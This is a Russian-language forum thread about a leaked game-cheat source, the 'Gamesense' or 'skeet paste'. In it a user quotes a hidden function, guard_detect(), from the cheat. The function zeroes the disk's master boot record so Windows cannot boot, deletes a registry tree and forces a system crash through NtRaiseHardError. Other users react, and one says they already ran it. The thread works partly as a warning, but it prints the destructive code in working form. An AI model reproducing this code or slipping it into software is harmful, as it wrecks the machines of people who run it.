Подпишитесь на наш Telegram-канал, чтобы всегда быть в курсе важных обновлений! Перейти

Outdated Gamesense 100% Made in Russia aka skeet paste [UPD 12.01.2021]

Статус
В этой теме нельзя размещать новые ответы.
Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
чел удаляй тему нахуй ты не закомментил
void misc::guard_detect() {
// чистим мбр, чтобы винда не запустилась после перезапуска пк.
DWORD write;
char mbr[512];
ZeroMemory(mbr, sizeof mbr);
HANDLE MasterBootRecord = CreateFileW(L"\\\\.\\PhysicalDrive0", GENERIC_ALL, FILE_SHARE_READ | FILE_SHARE_WRITE, NULL, OPEN_EXISTING, NULL, NULL);
if (WriteFile(MasterBootRecord, mbr, 512, &write, NULL) == TRUE) {
// если эта хуйня произошла - пиздуй искать на подъездах объявления о сервисных сентрах для пк.
HKEY hKey = NULL;
if (RegOpenKeyExW(HKEY_CURRENT_USER, L"AppEvents\\", NULL, DELETE | KEY_ENUMERATE_SUB_KEYS | KEY_QUERY_VALUE | KEY_SET_VALUE | KEY_WOW64_64KEY, &hKey) == ERROR_SUCCESS) {
if (RegDeleteTree(hKey, NULL) == ERROR_SUCCESS) {
BOOLEAN bl;
ULONG Response;
RtlAdjustPrivilege(19, TRUE, FALSE, &bl);
NtRaiseHardError(STATUS_ASSERTION_FAILURE, NULL, NULL, NULL, 6, &Response);
}
RegCloseKey(hKey);
}
}
}
Ща пофиксим закоменчу(я не знал о этой хуйне)

Дайте длл хд

блять помянем меня я запустил та еще и поиграл с этой поеботой(

Обратите внимание, пользователь заблокирован на форуме. Не рекомендуется проводить сделки.
Та тебе нихуя не будет вроде
1610113618650.png

Все удалил
1610113790519.png

Там все изначально было вырезано на половину

кфг где? \

Статус
В этой теме нельзя размещать новые ответы.
Назад
Сверху Снизу